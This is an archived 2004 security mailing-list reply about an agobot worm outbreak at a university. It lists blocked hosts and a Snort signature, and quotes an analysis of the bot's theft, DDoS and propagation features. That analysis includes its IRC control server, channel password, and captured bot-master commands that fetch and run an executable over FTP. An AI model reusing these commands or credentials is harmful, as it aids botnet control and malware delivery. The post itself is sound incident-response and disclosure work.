lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
From: ddh at mtu.edu (David Hale) Subject: Re: Outbreak of a virus on campus We have currently blocked connections to port to/from 7000 on the following hosts: 130.74.82.206 131.234.100.43 193.87.20.31 This seems to have contained the spread of the worm within our campus. The list of hosts was gathered with a snort signature of: alert tcp $HOME_NET any -> any 7000 (msg:"agobot IRC traffic"; content:"weednet";classtype:bad-unknown; sid:71727; rev:1;) Until the block was in place we had shut down around 50 hosts (mainly on our dorm network) that had been infected with the worm. -Dave Hale Sr. Security Specialist Michigan Technological University > > ----- Original Message ----- > From: "Morning Wood" > Date: Sat, 24 Apr 2004 18:37:31 +0000 > To: mueller@...net.com, full-disclosure@...ts.netsys.com > Subject: RE: [Full-Disclosure] Re: Outbreak of a virus on campus > >> phatbot? > > This one is yet another agobot. Has long list of useful commands > (included in the end of posting, if someone is interested...), > polymorph capability, stealth capability -hides its own process > in memory and binary from listing, capable of updating itself > via ftp/http, has list of servers for evaluating connection speed, > steals cdkeys, sniffs a wire, performs ddos, capable installing > a proxy, sends spam via aol, can install identd, has LONG list > various processes to kill (mostly AV, but also regedit and tcpview > among others), retrievs sysinfo, makes screenshots etc etc etc - > looks similar to others good household bot's :) > > What makes its interesting - its stealth capability and propagation. > It has following scanning/propagation subroutines: > > CScannerBagle > CScannerBase > CScannerDCOM > CScannerDoom > CScannerDW > CScannerHTTP > CScannerNetBios > CScannerOptix > CScannerSQL > CScannerUPNP > CScannerWKS > > > When worm is started, it connects to irc server > 193.87.20.31 (irc.weednet.net) port 7000. > Then it joines to password ptotected channel > #1337, password is heyho. As channel topic is > .scan.startall, it accepts command and starts > right away scanning. > > I took my trusty irc client and joined to that > channel by myself. Right away admin gave me those > commands: > > <admin> .login stebo jamesbond007 -s > <admin> .ftp.update ftp://ftp:bla@....uni-freiburg.de/incoming/dt.exe > %TEMP%\xgf.exeBLAOR12 > <admin> .scan.stop > <admin> .ftp.update ftp://ftp:bla@....uni-freiburg.de/incoming/dt.exe > c:\xgf.exe BLAOR12 > > seems like my 'bot' version was too old :) > > have fun :) > > W. > > > ----------------------- > commands and parameters > all commands starts with . (dot) > >
Powered by blists - more mailing lists